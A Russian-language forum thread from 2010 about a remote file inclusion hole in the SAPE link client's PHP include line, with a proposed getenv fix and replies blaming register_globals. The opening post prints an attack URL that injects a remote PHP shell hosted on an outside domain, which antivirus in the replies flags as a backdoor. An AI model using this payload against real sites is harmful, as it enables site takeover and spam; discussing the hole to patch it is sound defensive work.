Старый 17.04.2010, 18:24   #1
Новичок
 
Аватар для Shema
 
Регистрация: 14.10.2007
Адрес: Москва
Сообщений: 10
Вес репутации: 0
Shema на пути к лучшему
Отправить сообщение для Shema с помощью ICQ
По умолчанию Уязвимость сайта после вставки кода sape

Практика показала, что на некоторых хостингах и для некоторых движков код
Код:
<?php 
     if (!defined('_SAPE_USER')){
        define('_SAPE_USER', 'd56b17c1d94442b8874c6ad44aae3202'); 
     }
     require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); 
     $sape = new SAPE_client();
?>
является уязвимым! А именно строчка
require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php');

Злоумышненники, используя запрос вида
http://www.ваш-сайт.ru////?_SERVER[D...afterlife.txt? могут нарушить работу вашего сайта, в том числе рассылать спам от имени вашего сайта.

В качестве строчки после _SERVER[DOCUMENT_ROOT] используется ссылка на код эксплоита (ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно), а заодно проверить, не случится ли чего с вашим сайтом, если его подставить на место www.ваш-сайт.ru).

Решение проблемы на стороне сайта:
заменить
Код:
require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php');
на
Код:
require_once(getenv('DOCUMENT_ROOT').'/'._SAPE_USER.'/sape.php');
Просьба к разработчикам sape проверить, не противоречит ли моя замена чему-либо и, если нет, то обновить код для вставки для всех.
Shema вне форума   Ответить с цитированием
Старый 17.04.2010, 19:56   #2
Специалист
 
Регистрация: 09.12.2009
Сообщений: 193
Вес репутации: 0
drak не любят в этих краяхdrak не любят в этих краях
По умолчанию

уходите с хостинга, если вас ломанули.
и гуглите про register globals
drak вне форума   Ответить с цитированием
Старый 17.04.2010, 20:13   #3
Служу России!
 
Аватар для MonAmur
 
Регистрация: 03.07.2007
Адрес: Chinatown
Сообщений: 7,208
Вес репутации: 555
MonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущееMonAmur - прекрасное будущее
По умолчанию

Цитата:
ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно)
каспер не пустил...
Цитата:
Обнаружена угроза:
объект заражен Backdoor.PHP.Rst.f
MonAmur вне форума   Ответить с цитированием
Старый 17.04.2010, 20:16   #4
Пожиратель черепашкоВ
 
Аватар для chahlic
 
Регистрация: 24.12.2008
Адрес: Телемелетрямдия
Сообщений: 4,746
Вес репутации: 342
chahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущее
По умолчанию

Цитата:
Сообщение от MonAmur Посмотреть сообщение
каспер не пустил...
аналогичная фигня....
__________________
Смотри цены в САПе в своей валюте: плагин "Конвертер Валют" для ФФ.
chahlic вне форума   Ответить с цитированием
Старый 17.04.2010, 20:25   #5
Специалист
 
Регистрация: 06.11.2009
Сообщений: 428
Вес репутации: 131
afonia скоро станет известен
По умолчанию

Это что, такой оригинальный способ распространят вирусы ТС придумал? -)))
afonia вне форума   Ответить с цитированием
Старый 18.04.2010, 05:01   #6
Новичок
 
Аватар для Shema
 
Регистрация: 14.10.2007
Адрес: Москва
Сообщений: 10
Вес репутации: 0
Shema на пути к лучшему
Отправить сообщение для Shema с помощью ICQ
По умолчанию

dark, уходить с хостинга - вариант, переписать движок - тоже вариант (нормально написанный движок и нормально настроенный хостинг такой уязвимости не должны допустить), но если изменить в коде сапы одну строчку, то без потери функциональности проблемы можно избежать (кмк) на любом движке и на любом хостинге.
Shema вне форума   Ответить с цитированием
Старый 18.04.2010, 07:26   #7
Специалист
 
Регистрация: 19.11.2009
Сообщений: 157
Вес репутации: 128
sylex - весьма и весьма положительная личностьsylex - весьма и весьма положительная личностьsylex - весьма и весьма положительная личность
По умолчанию

Shema, неизвестно где и сколько еще в твоем сайте таких уязвимостей
sylex вне форума   Ответить с цитированием
Старый 18.04.2010, 12:19   #8
Новичок
 
Аватар для Shema
 
Регистрация: 14.10.2007
Адрес: Москва
Сообщений: 10
Вес репутации: 0
Shema на пути к лучшему
Отправить сообщение для Shema с помощью ICQ
По умолчанию

sylex, конечно, неизвестно.

И кстати проверил все свои сайты - сапа не добавила уязвимостей нормально написанному сайту. А вот затрояненный клиент на поддержку достался - куча сайтов с этой проблемой. А учитывая, что у сапы десятки тысяч сайтов, то даже пара процентов проблемных - это много. Поэтому, считаю, что если можно повысить безопасность кода, это надо сделать.
Shema вне форума   Ответить с цитированием
Старый 18.04.2010, 19:33   #9
Администратор
 
Аватар для Ank
 
Регистрация: 05.02.2007
Сообщений: 18,402
Вес репутации: 662
Ank - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущее
По умолчанию

Shema, абсолютно все могут НЕ пользоваться строчкой $_SERVER['DOCUMENT_ROOT'].
Что во первых - не уберет уязвимость, если она есть на этом хостинге.
2 - в приведенном примере что то сапы?

Ну а объяснить как ставить по другому чтобы было понятно ВСЕМ и работало ...
__________________
Начать зарабатывать на своих сайтах. Консультирую своих рефов по аське
Покупать на алиекспресс просто и выгодно
>>> БЕСПЛАТНЫЙ КОНСТРУКТОР САЙТОВ И LANDING PAGE <<<
Читаем ФАК
Ank вне форума   Ответить с цитированием
Старый 18.04.2010, 19:49   #10
Починяю примуса
 
Аватар для Atomic
 
Регистрация: 26.09.2008
Сообщений: 1,505
Вес репутации: 232
Atomic - прекрасное будущееAtomic - прекрасное будущееAtomic - прекрасное будущееAtomic - прекрасное будущееAtomic - прекрасное будущееAtomic - прекрасное будущееAtomic - прекрасное будущееAtomic - прекрасное будущееAtomic - прекрасное будущееAtomic - прекрасное будущееAtomic - прекрасное будущее
По умолчанию

ТС, мои соболезнования, если ваш хост и сайт позволяют подставлять в ГЕт суперглобальные переменные, то...
Цитата:
http://www.xn----7sbbf2b7bj7b.ru////?_SERVER[DOCUMENT_ROOT]=http://jokernet.fileave.com/afterlife.txt?
где там сапа, ума не приложу
__________________
Починяю разнокалиберные примуса здесь.
Atomic вне форума   Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужен php-скрипт для вставки текста SergejF Разработка и сопровождение сайтов 8 15.04.2010 23:09
Взлом сайта с установкой кода sape Paffy Вопросы по работе системы 4 31.01.2009 17:12
Проблема с индексацией страниц после обновления кода sape для контекстных ссылок serp Ошибки при работе с системой 0 06.03.2008 14:29
После установки кода sape сайты выпали из yandexa mgpetrov Яндекс 9 27.06.2007 16:44
полная замена движка сайта: порядок переноса кода SAPE? saddat Вопросы по работе системы 23 30.04.2007 10:23


Часовой пояс GMT +3, время: 10:39.